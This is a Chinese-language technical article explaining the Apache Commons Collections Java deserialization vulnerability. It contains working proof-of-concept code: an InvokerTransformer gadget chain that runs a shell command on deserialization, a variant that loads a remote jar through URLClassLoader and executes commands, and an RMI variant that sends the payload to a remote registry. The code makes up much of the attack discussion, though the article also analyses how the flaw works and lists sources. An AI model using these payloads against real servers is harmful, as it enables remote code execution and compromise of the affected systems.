[[171784]]

Java反序列化漏洞從爆出到現(xiàn)在快2個(gè)月了，已有白帽子實(shí)現(xiàn)了jenkins，weblogic，jboss等的代碼執(zhí)行利用工具。本文對(duì)于Java反序列化的漏洞簡(jiǎn)述后，并對(duì)于Java反序列化的Poc進(jìn)行詳細(xì)解讀。

Java反序列化漏洞簡(jiǎn)介

• Java序列化就是把對(duì)象轉(zhuǎn)換成字節(jié)流，便于保存在內(nèi)存、文件、數(shù)據(jù)庫中，Java中的ObjectOutputStream類的writeObject()方法可以實(shí)現(xiàn)序列化。
• Java反序列化即逆過程，由字節(jié)流還原成對(duì)象。ObjectInputStream類的readObject()方法用于反序列化。

因此要利用Java反序列化漏洞，需要在進(jìn)行反序列化的地方傳入攻擊者的序列化代碼。能符合以上條件的地方即存在漏洞。

Java反序列化Poc詳解

public class test { 
    public static void main(String[] args) throws Exception { 
    String[] execArgs = new String[] { "sh", "-c", "whoami > /tmp/fuck" }; 
    Transformer[] transformers = new Transformer[] { 
        new ConstantTransformer(Runtime.class), 
        new InvokerTransformer( 
            "getMethod",  
            new Class[] {String.class, Class[].class },  
            new Object[] {"getRuntime", new Class[0] } 
        ), 
        new InvokerTransformer( 
            "invoke",  
            new Class[] {Object.class,  
            Object[].class }, new Object[] {null, null } 
        ), 
        new InvokerTransformer( 
            "exec",  
            new Class[] {String[].class },  
            new Object[] { execArgs } 
        ) 
     }; 
    Transformer transformedChain = new ChainedTransformer(transformers); 
  
    Map<String, String> BeforeTransformerMap = new HashMap<String, String>(); 
    BeforeTransformerMap.put("hello", "manning"); 
  
    Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain); 
  
    Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 
  
    Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); 
    ctor.setAccessible(true); 
    Object instance = ctor.newInstance(Target.class, AfterTransformerMap); 
  
    File f = new File("temp.bin"); 
    ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); 
    out.writeObject(instance); 
} 
} 
  

如果想徹底理解上面的poc，需要明白Java中的一些概念。

在Apache commons工具包中有很多jar包(jar包可以理解為python的庫)，具體jar包里面含有的內(nèi)容，如下圖所示。

其中Java反序列化的問題出在org.apache.commons.collections這個(gè)庫里面。org.apache.commons.collections提供一個(gè)類包來擴(kuò)展和增加標(biāo)準(zhǔn)的Java的collection框架，也就是說這些擴(kuò)展也屬于collection的基本概念，只是功能不同罷了。Java中的collection可以理解為一組對(duì)象，collection里面的對(duì)象稱為collection的對(duì)象。具象的collection為set，list，queue等等。換一種理解方式，collection是set，list，queue的抽象，collection中文含義是收集的意思，那么收集的具體方式就可以是set，list，queue了。

在org.apache.commons.collections內(nèi)提供了一個(gè)接口類叫Transformer，這個(gè)接口的英文定義為

Defines a functor interface implemented by classes that transform one object into another.

也就是說接口于Transformer的類都具備把一個(gè)對(duì)象轉(zhuǎn)化為另一個(gè)對(duì)象的功能。目前已知接口于Transformer的類，如下如所示。

圖上帶箭頭指示的為Java反序列化漏洞的poc含有的類。

• ConstantTransformer

          Transformer implementation that returns the same constant each time. (把一個(gè)對(duì)象轉(zhuǎn)化為常量，并返回)

• InvokerTransformer

          Transformer implementation that creates a new object instance by reflection. (通過反射，返回一個(gè)對(duì)象)

• ChainedTransformer

          Transformer implementation that chains the specified transformers together. (把一些transformer鏈接到一起，構(gòu)成一組鏈條，對(duì)一個(gè)對(duì)象依次通過鏈條內(nèi)的每一個(gè)transformer進(jìn)行           轉(zhuǎn)換)

有了以上的相關(guān)概念，就可以理解最開始的poc了。poc里面，我們一共創(chuàng)建了以下關(guān)鍵對(duì)象。

• execArgs

          待執(zhí)行的命令數(shù)組

• transformers

          一個(gè)transformer鏈，包含預(yù)設(shè)轉(zhuǎn)化邏輯(各類transformer對(duì)象)的轉(zhuǎn)化數(shù)組

• transformedChain

          ChainedTransformer類對(duì)象，傳入transformers數(shù)組，可以按照transformers數(shù)組的邏輯執(zhí)行轉(zhuǎn)化操作

• BeforeTransformerMap

          Map數(shù)據(jù)結(jié)構(gòu)，轉(zhuǎn)換前的Map，Map數(shù)據(jù)結(jié)構(gòu)內(nèi)的對(duì)象是鍵值對(duì)形式，類比于python的dict理解即可

• AfterTransformerMap

          Map數(shù)據(jù)結(jié)構(gòu)，轉(zhuǎn)換后的Map

整個(gè)poc的邏輯可以這么理解，構(gòu)建了BeforeTransformerMap的鍵值對(duì)，為其賦值，利用TransformedMap的decorate方法，可以對(duì)Map數(shù)據(jù)結(jié)構(gòu)的key，value進(jìn)行transforme。

TransformedMap.decorate方法,預(yù)期是對(duì)Map類的數(shù)據(jù)結(jié)構(gòu)進(jìn)行轉(zhuǎn)化，該方法有三個(gè)參數(shù)。第一個(gè)參數(shù)為待轉(zhuǎn)化的Map對(duì)象，第二個(gè)參數(shù)為Map對(duì)象內(nèi)的key要經(jīng)過的轉(zhuǎn)化方法(可為單個(gè)方法，也可為鏈，也可為空)，第三個(gè)參數(shù)為Map對(duì)象內(nèi)的value要經(jīng)過的轉(zhuǎn)化方法。

TransformedMap.decorate(目標(biāo)Map, key的轉(zhuǎn)化對(duì)象(單個(gè)或者鏈或者null), value的轉(zhuǎn)化對(duì)象(單個(gè)或者鏈或者null));

上圖是調(diào)試時(shí)的轉(zhuǎn)換變量?jī)?nèi)容，可以很清楚地看到執(zhí)行完poc后，已經(jīng)對(duì)Map的value進(jìn)行了轉(zhuǎn)換(過了一遍transformer鏈)。

poc中對(duì)BeforeTransformerMap的value進(jìn)行轉(zhuǎn)換，當(dāng)BeforeTransformerMap的value執(zhí)行完一個(gè)完整轉(zhuǎn)換鏈，就完成了命令執(zhí)行。

在進(jìn)行反序列化時(shí)，我們會(huì)調(diào)用ObjectInputStream類的readObject()方法。如果被反序列化的類重寫了readObject()，那么該類在進(jìn)行反序列化時(shí)，Java會(huì)優(yōu)先調(diào)用重寫的readObject()方法。

結(jié)合前述Commons Collections的特性，如果某個(gè)可序列化的類重寫了readObject()方法，并且在readObject()中對(duì)Map類型的變量進(jìn)行了鍵值修改操作，并且這個(gè)Map變量是可控的，就可以實(shí)現(xiàn)我們的攻擊目標(biāo)了。

因此我們?cè)趐oc中看見了下行的代碼。

Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 

這個(gè)類完全符合我們的要求，具體解釋可以查看TSRC的文章。

如果要實(shí)現(xiàn)一個(gè)可控的poc，需要對(duì)transformer鏈的構(gòu)造進(jìn)行理解。首先來看InvokerTransformer。

InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) 

參數(shù)依次為：方法名稱，參數(shù)類型，參數(shù)對(duì)象 我們找其中一個(gè)來看下。

new InvokerTransformer( 
    "getMethod",  
    new Class[]  {String.class, Class[].class },  
    new Object[] {"getRuntime", new Class[0] } 
), 
new InvokerTransformer( 
    "invoke",  
    new Class[] {Object.class, Object[].class },  
    new Object[] {null, null } 
), 
new InvokerTransformer( 
    "exec",  
    new Class[] {String.class },  
    new Object[] {"gedit"} 
) 

參數(shù)類型里面的內(nèi)容完全對(duì)應(yīng)于參數(shù)對(duì)象里的內(nèi)容。

PS：由于Method類的invoke(Object obj,Object args[])方法的定義，所以在反射內(nèi)寫new Class[] {Object.class, Object[].class }。

所以正常流程如下所示：

((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit"); 

基于報(bào)錯(cuò)的反序列化transformer鏈

Transformer[] transformers = new Transformer[] { 
new ConstantTransformer(Java.net.URLClassLoader.class), 
new InvokerTransformer( 
    "getConstructor",  
    new Class[] {Class[].class},  
    new Object[] {new Class[]{Java.net.URL[].class}} 
), 
new InvokerTransformer( 
    "newInstance",  
    new Class[] {Object[].class},  
    new Object[] { new Object[] { new Java.net.URL[] { new Java.net.URL(url) }}} 
), 
new InvokerTransformer( 
    "loadClass", 
    new Class[] { String.class },  
    new Object[] { "ErrorBaseExec" } 
), 
new InvokerTransformer( 
    "getMethod", 
    new Class[]{String.class, Class[].class},  
    new Object[]{"do_exec", new Class[]{String.class}} 
), 
new InvokerTransformer( 
    "invoke", 
    new Class[]{Object.class, Object[].class},  
    new Object[]{null, new String[]{cmd}} 
) 
};  
  

有了先前的理解，很明了了。先建立一個(gè)讀取遠(yuǎn)程jar文件的類 URLClassLoader，實(shí)例化這個(gè)類，傳入要訪問的url，再讀取遠(yuǎn)程加載類，接著獲取類方法，然后反射這個(gè)方法。

關(guān)于RMI利用的相關(guān)內(nèi)容

tang3已經(jīng)在RMI利用文章講過怎么利用了，這段內(nèi)容，我只是詳解下給出的poc的原理。

poc部分內(nèi)容

Transformer transformedChain = new ChainedTransformer(transformers); 
  
Map BeforeTransformerMap = new HashMap(); 
innerMap.put("value", "value"); 
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain); 
  
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); 
ctor.setAccessible(true); 
Object instance = ctor.newInstance(Target.class, AfterTransformerMap); 
  
InvocationHandler h = (InvocationHandler) instance; 
Remote r = Remote.class.cast(Proxy.newProxyInstance( 
                        Remote.class.getClassLoader(),  
                        new Class[]{Remote.class},  
                        h)); 
try{ 
Registry registry = LocateRegistry.getRegistry(ip, port); 
registry.rebind("", r); // r is remote obj 
} 
catch (Throwable e) { 
e.printStackTrace(); 
}            
  

RMI利用的poc看上去還是很熟悉的，因?yàn)榈浇nstance時(shí)，還和之前的內(nèi)容一致。之后便到了RMI內(nèi)容獨(dú)有的細(xì)節(jié)，從代碼角度可以看出利用邏輯為：

• 建立實(shí)例對(duì)象instance
• 實(shí)例對(duì)象instance 轉(zhuǎn)化為 InvocationHandler類型的句柄h(因?yàn)閕nstance是序列化后的內(nèi)容，所以instance就是一串?dāng)?shù)據(jù))
• 把句柄h附載到Remote類實(shí)例 r上
• 向遠(yuǎn)程服務(wù)器注冊(cè)，得到遠(yuǎn)程注冊(cè)對(duì)象 registry
• 向遠(yuǎn)程注冊(cè)對(duì)象registry注冊(cè) 實(shí)例r

在Java的RMI中，我們?cè)试S向遠(yuǎn)程已運(yùn)行的jvm虛擬環(huán)境中綁定(rebind函數(shù)，也可以理解為添加)一些實(shí)例對(duì)象，通過RMI協(xié)議傳輸一些序列化好的內(nèi)容，這樣服務(wù)端解析(也就是反序列化)傳過來的數(shù)據(jù)后，便可把解析后的內(nèi)容添加到運(yùn)行環(huán)境中。構(gòu)造remote類型實(shí)例r 方法很多，poc中利用動(dòng)態(tài)代理創(chuàng)建remote實(shí)例r是方法之一。

因此涉及RMI的代碼也會(huì)存在Java反序列化漏洞。

漏洞影響分析

Java反序列化漏洞從爆出到現(xiàn)在快2個(gè)月了。最開始的只能命令執(zhí)行和反彈shell，到后來的有回顯的命令執(zhí)行，到最終的代碼執(zhí)行，利用上來是越來越方便(有回顯的命令執(zhí)行和代碼執(zhí)行均為利用遠(yuǎn)程jar文件的利用形式)。從微博來看，已有白帽子實(shí)現(xiàn)了jenkins，weblogic，jboss等的代碼執(zhí)行利用工具。待最終利用工具公布，此漏洞還會(huì)有一個(gè)上升趨勢(shì)的影響。

資料引用

• http://blog.chaitin.com/2015-11-11_java_unserialize_rce/
• http://security.tencent.com/index.php/blog/msg/97
• http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
• http://www.infoq.com/cn/articles/cf-java-object-serialization-rmi
• http://blog.nsfocus.net/learning-guide-java-serialization-de-serialization-vulnerability-remediation/
• http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/